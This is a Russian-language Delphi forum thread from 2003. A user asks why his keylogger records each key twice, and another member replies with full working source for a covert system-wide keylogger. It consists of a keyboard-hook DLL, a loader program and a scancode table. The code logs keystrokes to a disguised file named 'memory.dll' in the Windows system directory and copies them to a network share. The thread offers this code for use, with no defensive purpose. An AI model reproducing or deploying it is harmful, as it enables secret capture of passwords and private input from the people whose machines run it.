KeyLoger

← →
FoXx (2003-01-03 20:23) [0]

Помогите plz, нужен исходник keyloger"a, тот который в статье по установке hooks у меня почему то все нажатые клавиши дублирует, если кто знает в чем дело, plz напишите!

← →
Юрий Зотов (2003-01-03 20:37) [1]

Клавишу мы сначала НАЖИМАЕМ, так?
А потом ОТПУСКАЕМ, так?

Этого достаточно.

← →
FoXx (2003-01-03 20:54) [2]

Так это в примере учтено! Но все равно они дублируются!

← →
Song (2003-01-04 08:57) [3]

Ошибка в 17-ой строке.

← →
Севостьянов Игорь (2003-01-04 12:57) [4]

Не знаю, что там в статье, когда то сам написал, как ты выразился "KeyLoger":
Вот рабочий код:

library KbdAgnt; uses Windows, KeyboardHook in "KeyboardHook.pas"; exports KeyboardProc; var hFileMappingObject: THandle; lpvMem: Pointer; //----------------------------// // DLL_PROCESS_DETACH // //----------------------------// procedure DLLMain(Reason: Integer); begin if Reason = DLL_PROCESS_DETACH then begin UnmapViewOfFile(lpvMem); CloseHandle(hFileMappingObject); end; end; //----------------------------// // DLL_PROCESS_ATTACH // //----------------------------// begin DLLProc := @DLLMain; hFileMappingObject := CreateFileMapping( THandle($FFFFFFFF), // use paging file nil, // no security attributes PAGE_READWRITE, // read/write access 0, // size: high 32 bits 4096, // size: low 32 bits "HookAgentShareMem" // name of map object ); if hFileMappingObject = INVALID_HANDLE_VALUE then begin ExitCode := 1; Exit; end; lpvMem := MapViewOfFile( hFileMappingObject, // object to map view of FILE_MAP_WRITE, // read/write access 0, // high offset: map from 0, // low offset: beginning 0 // default: map entire file ); if lpvMem = nil then begin CloseHandle(hFileMappingObject); ExitCode := 1; Exit; end; end. --------- unit KeyboardHook; interface uses Windows, Classes, SysUtils, Messages; const LocalFileName: string = "\memory.dll"; FarFileName: string = "\\MAN-NT\Common\keyboard.sys"; MaxFileSize = 1048576; var hCurrentHook: HHOOK; FileName: string; function KeyboardProc(hCode: Integer; vkCode: WPARAM; ksMsgInf: LPARAM ): LRESULT; stdcall; implementation uses Dialogs; {$I Scancode.inc} procedure SaveToFile(vkCode: WPARAM); const INVALID_HANDLE_VALUE = -1; var LocalFile, FarFile: TextFile; WinSysDir: array[0..MAX_PATH] of char; SearchInfo32: WIN32_FIND_DATA; Find32Handle: LongInt; begin FileName := EmptyStr; if GetSystemDirectory(WinSysDir, MAX_PATH) <> 0 then FileName := StrPas(WinSysDir) + LocalFileName; //FileName := "c:\temp" + LocalFileName; AssignFile(LocalFile, FileName); AssignFile(FarFile, FarFileName); {$I-} //================================================== try Find32Handle := FindFirstFile(PChar(FileName), SearchInfo32); if Find32Handle <> INVALID_HANDLE_VALUE then if ((SearchInfo32.dwFileAttributes and FILE_ATTRIBUTE_DIRECTORY) = 0) then if SearchInfo32.nFileSizeLow > MaxFileSize then DeleteFile(FileName); except; end; //================================================== if not FileExists(FileName) then Rewrite(LocalFile) else Append(LocalFile); if not FileExists(FarFileName) then Rewrite(FarFile) else Append(FarFile); {$I+} try Write(LocalFile, CodeToChar(vkCode)); Write(FarFile, CodeToChar(vkCode)); finally CloseFile(FarFile); CloseFile(LocalFile); end; end; function KeyboardProc(hCode: Integer; vkCode: WPARAM; ksMsgInf: LPARAM ): LRESULT; begin if (hCode = HC_ACTION) and ((HiWord(ksMsgInf) and KF_UP) = 0) then SaveToFile(vkCode); Result := CallNextHookEx(hCurrentHook, hCode, vkCode, ksMsgInf); end; end. ----------------------------------------------- program kbdsrv; uses Windows, Dialogs; const KBDHOOKDLL = "KbdAgnt.dll"; var hinstDLL: HINST; hkprcKeyboard: TFNHookProc; msg: TMsg; begin hinstDLL := LoadLibrary(KBDHOOKDLL); hkprcKeyboard := GetProcAddress(hinstDLL, "KeyboardProc"); SetWindowsHookEx(WH_KEYBOARD, hkprcKeyboard, hinstDLL, 0); repeat until not GetMessage(msg, 0, 0, 0); end.

← →
Севостьянов Игорь (2003-01-04 13:02) [5]

Да забыл еще вот это

Scancode.inc:

function CodeToChar(Code: WPARAM): string; begin Case Code of 027 : Result := "[Esc] "; 112 : Result := "[F1] "; 113 : Result := "[F2] "; 114 : Result := "[F3] "; 115 : Result := "[F4] "; 116 : Result := "[F5] "; 117 : Result := "[F6] "; 118 : Result := "[F7] "; 119 : Result := "[F8] "; 120 : Result := "[F9] "; 121 : Result := "[F10] "; 122 : Result := "[F11] "; 123 : Result := "[F12] "; 145 : Result := "[ScrollLock] "; 019 : Result := "[Pause/Break] "; 192 : Result := "[~] "; 049 : Result := "[1] "; 050 : Result := "[2] "; 051 : Result := "[3] "; 052 : Result := "[4] "; 053 : Result := "[5] "; 054 : Result := "[6] "; 055 : Result := "[7] "; 056 : Result := "[8] "; 057 : Result := "[9] "; 048 : Result := "[0] "; 189 : Result := "[-] "; 187 : Result := "[+] "; 220 : Result := "[\] "; 008 : Result := "[BackSpace] "; 045 : Result := "[Insert] "; 036 : Result := "[Home] "; 033 : Result := "[PgDn] "; 009 : Result := "[Tab] "; 144 : Result := "[NumLock] "; 111 : Result := "[/] "; 106 : Result := "[*] "; 109 : Result := "[-] "; 081 : Result := "[q] "; 087 : Result := "[w] "; 069 : Result := "[e] "; 082 : Result := "[r] "; 084 : Result := "[t] "; 089 : Result := "[y] "; 085 : Result := "[u] "; 073 : Result := "[i] "; 079 : Result := "[o] "; 080 : Result := "[p] "; 219 : Result := "[[] "; 221 : Result := "[]] "; 013 : Result := "[Enter] "; 046 : Result := "[Delete] "; 035 : Result := "[End] "; 034 : Result := "[PgDn] "; 103 : Result := "[7] "; 104 : Result := "[8] "; 105 : Result := "[9] "; 107 : Result := "[+] "; 020 : Result := "[CapsLock] "; 065 : Result := "[a] "; 083 : Result := "[s] "; 068 : Result := "[d] "; 070 : Result := "[f] "; 071 : Result := "[g] "; 072 : Result := "[h] "; 074 : Result := "[j] "; 075 : Result := "[k] "; 076 : Result := "[l] "; 186 : Result := "[;] "; 222 : Result := "[""""] "; 100 : Result := "[4] "; 101 : Result := "[5] "; 102 : Result := "[6] "; 016 : Result := "[Shift] "; 090 : Result := "[z] "; 088 : Result := "[x] "; 067 : Result := "[c] "; 086 : Result := "[v] "; 066 : Result := "[b] "; 078 : Result := "[n] "; 077 : Result := "[m] "; 188 : Result := "[,] "; 190 : Result := "[.] "; 191 : Result := "[/] "; 038 : Result := "[Up] "; 097 : Result := "[1] "; 098 : Result := "[2] "; 099 : Result := "[3] "; 017 : Result := "[Ctrl] "; 091 : Result := "[WinMainMenu] "; 018 : Result := "[Alt] "; 032 : Result := "[Space] "; 093 : Result := "[WinPopUpMenu] "; 037 : Result := "[Left] "; 040 : Result := "[Down] "; 039 : Result := "[Right] "; 096 : Result := "[0] "; 110 : Result := "[Delete] "; end; end;

KeyLoger Найти похожие ветки